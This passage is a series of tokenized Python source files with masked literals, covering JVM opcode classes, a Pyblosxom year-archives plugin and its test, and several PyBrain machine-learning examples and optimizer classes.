<EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . 
read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LLOAD_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LLOAD_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LLOAD_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LLOAD_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LLOAD_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LLOAD_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LLOAD_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LLOAD_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LMUL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LMUL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LNEG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LNEG , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class LOOKUPSWITCH ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LOOKUPSWITCH , self ) . __init__ ( ) <EOL> class LOR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LOR , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LREM ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LREM , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LRETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LRETURN , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class LSHL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSHL , self ) . __init__ ( ) <EOL> class LSHR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSHR , self ) . __init__ ( ) <EOL> class LSTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSTORE , self ) . __init__ ( ) <EOL> class LSTORE_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSTORE_0 , self ) . __init__ ( ) <EOL> class LSTORE_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSTORE_1 , self ) . __init__ ( ) <EOL> class LSTORE_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSTORE_2 , self ) . 
__init__ ( ) <EOL> class LSTORE_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSTORE_3 , self ) . __init__ ( ) <EOL> class LSUB ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSUB , self ) . __init__ ( ) <EOL> class LUSHR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LUSHR , self ) . __init__ ( ) <EOL> class LXOR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LXOR , self ) . __init__ ( ) <EOL> class MONITORENTER ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( MONITORENTER , self ) . __init__ ( ) <EOL> class MONITOREXIT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( MONITOREXIT , self ) . __init__ ( ) <EOL> class MULTIANEWARRAY ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( MULTIANEWARRAY , self ) . __init__ ( ) <EOL> class NEW ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name ) : <EOL> super ( NEW , self ) . __init__ ( ) <EOL> self . classref = Classref ( class_name ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . classref . name <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> classref = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> classref . name . bytes . decode ( '<STR_LIT>' ) , <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . classref ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . classref . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class NEWARRAY ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( NEWARRAY , self ) . 
__init__ ( ) <EOL> class NOP ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( NOP , self ) . __init__ ( ) <EOL> class POP ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( POP , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class POP2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( POP2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class PUTFIELD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , field_name , descriptor ) : <EOL> super ( PUTFIELD , self ) . __init__ ( ) <EOL> self . field = Fieldref ( class_name , field_name , descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . field . klass . name , self . field . name , self . field . name_and_type . descriptor ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> field = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> field . class_name , <EOL> field . name , <EOL> field . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . field ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . field . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class PUTSTATIC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , field_name , descriptor ) : <EOL> super ( PUTSTATIC , self ) . __init__ ( ) <EOL> self . 
field = Fieldref ( class_name , field_name , descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . field . klass . name , self . field . name , self . field . name_and_type . descriptor ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> field = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> field . class_name , <EOL> field . name , <EOL> field . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . field ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . field . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class RET ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( RET , self ) . __init__ ( ) <EOL> class RETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( RETURN , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class SALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( SALOAD , self ) . __init__ ( ) <EOL> class SASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( SASTORE , self ) . __init__ ( ) <EOL> class SIPUSH ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , const ) : <EOL> super ( SIPUSH , self ) . __init__ ( ) <EOL> self . const = const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . const <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> const = reader . 
read_s2 ( ) <EOL> return cls ( const ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . const ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class SWAP ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( SWAP , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class TABLESWITCH ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( TABLESWITCH , self ) . __init__ ( ) <EOL> class WIDE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( WIDE , self ) . __init__ ( ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> __url__ = "<STR_LIT>" <EOL> __description__ = "<STR_LIT>" <EOL> __category__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __registrytags__ = "<STR_LIT>" <EOL> from Pyblosxom import tools , entries <EOL> from Pyblosxom . memcache import memcache_decorator <EOL> from Pyblosxom . tools import pwrap <EOL> import time <EOL> def verify_installation ( request ) : <EOL> config = request . get_configuration ( ) <EOL> if not '<STR_LIT>' in config : <EOL> pwrap ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return True <EOL> class YearArchives : <EOL> def __init__ ( self , request ) : <EOL> self . _request = request <EOL> self . _archives = None <EOL> self . _items = None <EOL> @ memcache_decorator ( '<STR_LIT>' , True ) <EOL> def __str__ ( self ) : <EOL> if self . _archives is None : <EOL> self . gen_linear_archive ( ) <EOL> return self . _archives <EOL> def gen_linear_archive ( self ) : <EOL> config = self . _request . get_configuration ( ) <EOL> data = self . _request . get_data ( ) <EOL> root = config [ "<STR_LIT>" ] <EOL> archives = { } <EOL> archive_list = tools . walk ( self . _request , root ) <EOL> items = [ ] <EOL> fulldict = { } <EOL> fulldict . update ( config ) <EOL> fulldict . update ( data ) <EOL> flavour = data . get ( <EOL> "<STR_LIT>" , config . get ( "<STR_LIT>" , "<STR_LIT:html>" ) ) <EOL> template = config . get ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> for mem in archive_list : <EOL> timetuple = tools . filestat ( self . _request , mem ) <EOL> timedict = { } <EOL> for x in [ "<STR_LIT:m>" , "<STR_LIT:Y>" , "<STR_LIT:y>" , "<STR_LIT:d>" ] : <EOL> timedict [ x ] = time . strftime ( "<STR_LIT:%>" + x , timetuple ) <EOL> fulldict . 
update ( timedict ) <EOL> fulldict [ "<STR_LIT:f>" ] = flavour <EOL> year = fulldict [ "<STR_LIT:Y>" ] <EOL> if not year in archives : <EOL> archives [ year ] = template % fulldict <EOL> items . append ( <EOL> [ "<STR_LIT>" % fulldict , <EOL> "<STR_LIT>" % fulldict , <EOL> time . mktime ( timetuple ) , <EOL> mem ] ) <EOL> arc_keys = archives . keys ( ) <EOL> arc_keys . sort ( ) <EOL> arc_keys . reverse ( ) <EOL> result = [ ] <EOL> for key in arc_keys : <EOL> result . append ( archives [ key ] ) <EOL> self . _archives = '<STR_LIT:\n>' . join ( result ) <EOL> self . _items = items <EOL> def new_entry ( request , yearmonth , body ) : <EOL> """<STR_LIT>""" <EOL> entry = entries . base . EntryBase ( request ) <EOL> entry [ '<STR_LIT:title>' ] = yearmonth <EOL> entry [ '<STR_LIT:filename>' ] = yearmonth + "<STR_LIT>" <EOL> entry [ '<STR_LIT>' ] = yearmonth <EOL> entry . _id = yearmonth + "<STR_LIT>" <EOL> entry [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> entry [ "<STR_LIT>" ] = "<STR_LIT:yes>" <EOL> entry [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> entry [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> entry . set_time ( time . strptime ( yearmonth , "<STR_LIT>" ) ) <EOL> entry . set_data ( body ) <EOL> return entry <EOL> INIT_KEY = "<STR_LIT>" <EOL> def cb_prepare ( args ) : <EOL> request = args [ "<STR_LIT>" ] <EOL> data = request . get_data ( ) <EOL> data [ "<STR_LIT>" ] = YearArchives ( request ) <EOL> def cb_date_head ( args ) : <EOL> request = args [ "<STR_LIT>" ] <EOL> data = request . get_data ( ) <EOL> if INIT_KEY in data : <EOL> args [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> return args <EOL> def parse_path_info ( path ) : <EOL> """<STR_LIT>""" <EOL> path = path . split ( "<STR_LIT:/>" ) <EOL> path = [ m for m in path if m ] <EOL> if not path : <EOL> return <EOL> year = path [ <NUM_LIT:0> ] <EOL> if not year . 
isdigit ( ) or not len ( year ) == <NUM_LIT:4> : <EOL> return <EOL> if len ( path ) == <NUM_LIT:1> : <EOL> return ( year , None ) <EOL> if len ( path ) == <NUM_LIT:2> and path [ <NUM_LIT:1> ] . startswith ( "<STR_LIT:index>" ) : <EOL> flav = None <EOL> if "<STR_LIT:.>" in path [ <NUM_LIT:1> ] : <EOL> flav = path [ <NUM_LIT:1> ] . split ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> return ( year , flav ) <EOL> return <EOL> def cb_filelist ( args ) : <EOL> request = args [ "<STR_LIT>" ] <EOL> pyhttp = request . get_http ( ) <EOL> data = request . get_data ( ) <EOL> config = request . get_configuration ( ) <EOL> baseurl = config . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> path = pyhttp [ "<STR_LIT>" ] <EOL> ret = parse_path_info ( path ) <EOL> if ret == None : <EOL> return <EOL> year , flavour = ret <EOL> data [ INIT_KEY ] = <NUM_LIT:1> <EOL> wa = YearArchives ( request ) <EOL> wa . gen_linear_archive ( ) <EOL> items = wa . _items <EOL> items = [ m for m in items if m [ <NUM_LIT:0> ] . startswith ( year ) ] <EOL> items . sort ( ) <EOL> items . reverse ( ) <EOL> if not flavour : <EOL> flavour = data . get ( <EOL> "<STR_LIT>" , config . get ( "<STR_LIT>" , "<STR_LIT:html>" ) ) <EOL> data [ "<STR_LIT>" ] = flavour <EOL> l = ( "<STR_LIT>" + baseurl + <EOL> "<STR_LIT>" + flavour + "<STR_LIT>" ) <EOL> e = "<STR_LIT>" <EOL> d = "<STR_LIT>" <EOL> m = "<STR_LIT>" <EOL> day = [ ] <EOL> month = [ ] <EOL> entrylist = [ ] <EOL> for mem in items : <EOL> if not m : <EOL> m = mem [ <NUM_LIT:0> ] <EOL> if not d : <EOL> d = mem [ <NUM_LIT:1> ] <EOL> if m != mem [ <NUM_LIT:0> ] : <EOL> month . append ( e % ( d , "<STR_LIT:\n>" . join ( day ) ) ) <EOL> entrylist . append ( new_entry ( request , m , "<STR_LIT:\n>" . join ( month ) ) ) <EOL> m = mem [ <NUM_LIT:0> ] <EOL> d = mem [ <NUM_LIT:1> ] <EOL> day = [ ] <EOL> month = [ ] <EOL> elif d != mem [ <NUM_LIT:1> ] : <EOL> month . append ( e % ( d , "<STR_LIT:\n>" . 
join ( day ) ) ) <EOL> d = mem [ <NUM_LIT:1> ] <EOL> day = [ ] <EOL> entry = entries . fileentry . FileEntry ( <EOL> request , mem [ <NUM_LIT:3> ] , config [ '<STR_LIT>' ] ) <EOL> day . append ( l % entry ) <EOL> if day : <EOL> month . append ( e % ( d , "<STR_LIT:\n>" . join ( day ) ) ) <EOL> if month : <EOL> entrylist . append ( new_entry ( request , m , "<STR_LIT:\n>" . join ( month ) ) ) <EOL> return entrylist </s>
<s> import time <EOL> import os <EOL> from Pyblosxom . tests import PluginTest , TIMESTAMP <EOL> from Pyblosxom . plugins import yeararchives <EOL> class Test_yeararchives ( PluginTest ) : <EOL> def setUp ( self ) : <EOL> PluginTest . setUp ( self , yeararchives ) <EOL> def tearDown ( self ) : <EOL> PluginTest . tearDown ( self ) <EOL> def test_parse_path_info ( self ) : <EOL> for testin , testout in [ <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT:/>" , None ) , <EOL> ( "<STR_LIT>" , ( "<STR_LIT>" , None ) ) , <EOL> ( "<STR_LIT>" , ( "<STR_LIT>" , None ) ) , <EOL> ( "<STR_LIT>" , ( "<STR_LIT>" , None ) ) , <EOL> ( "<STR_LIT>" , ( "<STR_LIT>" , "<STR_LIT>" ) ) , <EOL> ] : <EOL> self . assertEquals ( yeararchives . parse_path_info ( testin ) , <EOL> testout ) </s>
<s> __author__ = "<STR_LIT>" <EOL> __version__ = '<STR_LIT>' <EOL> from pybrain . tools . example_tools import ExTools <EOL> from pybrain . tools . shortcuts import buildNetwork <EOL> from pybrain . rl . environments . cartpole import CartPoleEnvironment , BalanceTask <EOL> from pybrain . rl . agents import LearningAgent <EOL> from pybrain . rl . learners import Reinforce <EOL> from pybrain . rl . experiments import EpisodicExperiment <EOL> batch = <NUM_LIT:50> <EOL> prnts = <NUM_LIT:4> <EOL> epis = <NUM_LIT> / batch / prnts <EOL> numbExp = <NUM_LIT:10> <EOL> et = ExTools ( batch , prnts , kind = "<STR_LIT>" ) <EOL> for runs in range ( numbExp ) : <EOL> env = CartPoleEnvironment ( ) <EOL> task = BalanceTask ( env , <NUM_LIT:200> , desiredValue = None ) <EOL> net = buildNetwork ( <NUM_LIT:4> , <NUM_LIT:1> , bias = False ) <EOL> agent = LearningAgent ( net , Reinforce ( ) ) <EOL> et . agent = agent <EOL> experiment = EpisodicExperiment ( task , agent ) <EOL> for updates in range ( epis ) : <EOL> for i in range ( prnts ) : <EOL> experiment . doEpisodes ( batch ) <EOL> state , action , reward = agent . learner . dataset . getSequence ( agent . learner . dataset . getNumSequences ( ) - <NUM_LIT:1> ) <EOL> et . printResults ( reward . sum ( ) , runs , updates ) <EOL> et . addExps ( ) <EOL> et . showExps ( ) </s>
<s> from __future__ import print_function <EOL> __author__ = "<STR_LIT>" <EOL> __version__ = '<STR_LIT>' <EOL> from pylab import figure , ioff , clf , contourf , ion , draw , show <EOL> from pybrain . utilities import percentError <EOL> from pybrain . tools . shortcuts import buildNetwork <EOL> from pybrain . supervised . trainers import BackpropTrainer <EOL> from pybrain . structure . modules import SoftmaxLayer <EOL> from . datasets import generateGridData , generateClassificationData , plotData <EOL> trndata = generateClassificationData ( <NUM_LIT> ) <EOL> trndata . _convertToOneOfMany ( bounds = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> tstdata = generateClassificationData ( <NUM_LIT:100> ) <EOL> tstdata . _convertToOneOfMany ( bounds = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> fnn = buildNetwork ( trndata . indim , <NUM_LIT:5> , trndata . outdim , outclass = SoftmaxLayer ) <EOL> trainer = BackpropTrainer ( fnn , dataset = trndata , momentum = <NUM_LIT:0.1> , verbose = True , weightdecay = <NUM_LIT> ) <EOL> griddata , X , Y = generateGridData ( [ - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> for i in range ( <NUM_LIT:20> ) : <EOL> trainer . trainEpochs ( <NUM_LIT:1> ) <EOL> trnresult = percentError ( trainer . testOnClassData ( ) , <EOL> trndata [ '<STR_LIT:class>' ] ) <EOL> tstresult = percentError ( trainer . testOnClassData ( <EOL> dataset = tstdata ) , tstdata [ '<STR_LIT:class>' ] ) <EOL> print ( "<STR_LIT>" % trainer . totalepochs , "<STR_LIT>" % trnresult , "<STR_LIT>" % tstresult ) <EOL> out = fnn . activateOnDataset ( griddata ) <EOL> out = out . argmax ( axis = <NUM_LIT:1> ) <EOL> out = out . reshape ( X . shape ) <EOL> figure ( <NUM_LIT:1> ) <EOL> ioff ( ) <EOL> clf ( ) <EOL> plotData ( tstdata ) <EOL> if out . max ( ) != out . min ( ) : <EOL> CS = contourf ( X , Y , out ) <EOL> ion ( ) <EOL> draw ( ) <EOL> ioff ( ) <EOL> show ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from pybrain . optimization . optimizer import ContinuousOptimizer <EOL> class DistributionBasedOptimizer ( ContinuousOptimizer ) : <EOL> """<STR_LIT>""" <EOL> online = False <EOL> batchSize = <NUM_LIT:100> <EOL> GAUSSIAN = <NUM_LIT:1> <EOL> CAUCHY = <NUM_LIT:2> <EOL> GENERALIZEDGAUSSIAN = <NUM_LIT:3> <EOL> STUDENTT = <NUM_LIT:4> <EOL> distributionType = GAUSSIAN <EOL> storeAllDistributions = False <EOL> def _updateDistribution ( self , dparamDeltas ) : <EOL> """<STR_LIT>""" <EOL> def _generateSample ( self ) : <EOL> """<STR_LIT>""" <EOL> def _generateConformingBatch ( self ) : <EOL> """<STR_LIT>""" </s>
<s> __author__ = '<STR_LIT>' <EOL> from scipy import array <EOL> from pybrain . optimization . optimizer import BlackBoxOptimizer <EOL> from pybrain . optimization . populationbased . ga import GA <EOL> from pybrain . tools . nondominated import const_non_dominated_front , const_crowding_distance , const_non_dominated_sort <EOL> class ConstMultiObjectiveGA ( GA ) : <EOL> """<STR_LIT>""" <EOL> topProportion = <NUM_LIT:0.5> <EOL> elitism = True <EOL> populationSize = <NUM_LIT:100> <EOL> mutationStdDev = <NUM_LIT:1.> <EOL> allowEquality = True <EOL> mustMaximize = True <EOL> def _learnStep ( self ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( self . fitnesses , dict ) : <EOL> oldfitnesses = self . fitnesses <EOL> self . fitnesses = dict ( ) <EOL> for indiv in self . currentpop : <EOL> if tuple ( indiv ) in oldfitnesses : <EOL> self . fitnesses [ tuple ( indiv ) ] = oldfitnesses [ tuple ( indiv ) ] <EOL> else : <EOL> self . fitnesses [ tuple ( indiv ) ] = self . _oneEvaluation ( indiv ) <EOL> del oldfitnesses <EOL> else : <EOL> self . fitnesses = dict ( [ ( tuple ( indiv ) , self . _oneEvaluation ( indiv ) ) for indiv in self . currentpop ] ) <EOL> if self . storeAllPopulations : <EOL> self . _allGenerations . append ( ( self . currentpop , self . fitnesses ) ) <EOL> if self . elitism : <EOL> self . bestEvaluable = list ( const_non_dominated_front ( list ( map ( tuple , self . currentpop ) ) , <EOL> key = lambda x : self . fitnesses [ x ] , <EOL> allowequality = self . allowEquality ) ) <EOL> else : <EOL> self . bestEvaluable = list ( const_non_dominated_front ( list ( map ( tuple , self . currentpop ) ) + self . bestEvaluable , <EOL> key = lambda x : self . fitnesses [ x ] , <EOL> allowequality = self . allowEquality ) ) <EOL> self . bestEvaluation = [ self . fitnesses [ indiv ] for indiv in self . bestEvaluable ] <EOL> self . produceOffspring ( ) <EOL> def select ( self ) : <EOL> return list ( map ( array , nsga2select ( list ( map ( tuple , self . 
currentpop ) ) , self . fitnesses , <EOL> self . selectionSize , self . allowEquality ) ) ) <EOL> def nsga2select ( population , fitnesses , survivors , allowequality = True ) : <EOL> """<STR_LIT>""" <EOL> fronts = const_non_dominated_sort ( population , <EOL> key = lambda x : fitnesses [ x ] , <EOL> allowequality = allowequality ) <EOL> individuals = set ( ) <EOL> for front in fronts : <EOL> remaining = survivors - len ( individuals ) <EOL> if not remaining > <NUM_LIT:0> : <EOL> break <EOL> if len ( front ) > remaining : <EOL> crowd_dist = const_crowding_distance ( front , fitnesses ) <EOL> front = sorted ( front , key = lambda x : crowd_dist [ x ] , reverse = True ) <EOL> front = set ( front [ : remaining ] ) <EOL> individuals |= front <EOL> return list ( individuals ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from . import sensors <EOL> import threading <EOL> from pybrain . utilities import threaded <EOL> from pybrain . tools . networking . udpconnection import UDPServer <EOL> from pybrain . rl . environments . environment import Environment <EOL> from scipy import ones , zeros , array , clip , arange , sqrt <EOL> from time import sleep <EOL> class FlexCubeEnvironment ( Environment ) : <EOL> def __init__ ( self , render = True , realtime = True , ip = "<STR_LIT:127.0.0.1>" , port = "<STR_LIT>" ) : <EOL> self . render = render <EOL> if self . render : <EOL> self . updateDone = True <EOL> self . updateLock = threading . Lock ( ) <EOL> self . server = UDPServer ( ip , port ) <EOL> self . actLen = <NUM_LIT:12> <EOL> self . mySensors = sensors . Sensors ( [ "<STR_LIT>" ] ) <EOL> self . dists = array ( [ <NUM_LIT> , sqrt ( <NUM_LIT> ) * <NUM_LIT:20> , sqrt ( <NUM_LIT> ) * <NUM_LIT:20> ] ) <EOL> self . gravVect = array ( [ <NUM_LIT:0.0> , - <NUM_LIT> , <NUM_LIT:0.0> ] ) <EOL> self . centerOfGrav = zeros ( ( <NUM_LIT:1> , <NUM_LIT:3> ) , float ) <EOL> self . pos = ones ( ( <NUM_LIT:8> , <NUM_LIT:3> ) , float ) <EOL> self . vel = zeros ( ( <NUM_LIT:8> , <NUM_LIT:3> ) , float ) <EOL> self . SpringM = ones ( ( <NUM_LIT:8> , <NUM_LIT:8> ) , float ) <EOL> self . d = <NUM_LIT> <EOL> self . dt = <NUM_LIT> <EOL> self . startHight = <NUM_LIT> <EOL> self . dumping = <NUM_LIT> <EOL> self . fraktMin = <NUM_LIT> <EOL> self . fraktMax = <NUM_LIT> <EOL> self . minAkt = self . dists [ <NUM_LIT:0> ] * self . fraktMin <EOL> self . maxAkt = self . dists [ <NUM_LIT:0> ] * self . fraktMax <EOL> self . reset ( ) <EOL> self . count = <NUM_LIT:0> <EOL> self . setEdges ( ) <EOL> self . act ( array ( [ <NUM_LIT> ] * <NUM_LIT:12> ) ) <EOL> self . euler ( ) <EOL> self . realtime = realtime <EOL> self . step = <NUM_LIT:0> <EOL> def closeSocket ( self ) : <EOL> self . server . UDPInSock . close ( ) <EOL> sleep ( <NUM_LIT:10> ) <EOL> def setEdges ( self ) : <EOL> self . 
